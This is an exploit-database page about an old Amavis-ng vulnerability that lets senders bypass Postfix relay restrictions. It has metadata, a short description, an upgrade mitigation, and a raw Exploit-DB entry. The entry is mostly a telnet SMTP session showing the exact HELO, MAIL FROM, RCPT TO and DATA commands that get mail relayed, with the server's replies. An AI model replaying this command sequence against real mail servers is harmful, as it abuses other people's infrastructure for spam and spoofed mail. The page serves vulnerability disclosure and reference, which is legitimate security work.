header-logo
Suggest Exploit
vendor:
Amavis-ng
by:
SecurityFocus
7.5
CVSS
HIGH
Bypass Relay Restriction
20
CWE
Product Name: Amavis-ng
Affected Version From: 0.1.6.x
Affected Version To: 0.1.6.x
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Amavis-ng Postfix Relay Restriction Bypass Vulnerability

It has been reported that some versions of Amavis-ng do not properly interact with Postfix. Because of this, an attacker may be able to circumvent relay restrictions. An attacker can connect to the Postfix SMTP server and issue a HELO command with the name of the Amavis-ng server. The attacker can then issue a MAIL FROM command with a valid user address and a RCPT TO command with an invalid user address. The attacker can then issue a DATA command and send an email to a valid user address. The email will be accepted and relayed by the Postfix server.

Mitigation:

Upgrade to the latest version of Amavis-ng.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7306/info

It has been reported that some versions of Amavis-ng do not properly interact with Postfix. Because of this, an attacker may be able to circumvent relay restrictions. 

#> telnet somemx.domain.tld 25
(220 somemx.example.com ESMTP Postfix)
helo amavis-ng
(250 somemx.example.com)
mail from:userX@example.com
(250 ok)
rcpt to:userY@example.com
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@example.com
To: userZ@example.com
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)

Navigation

Suggest Exploit

Services By CQR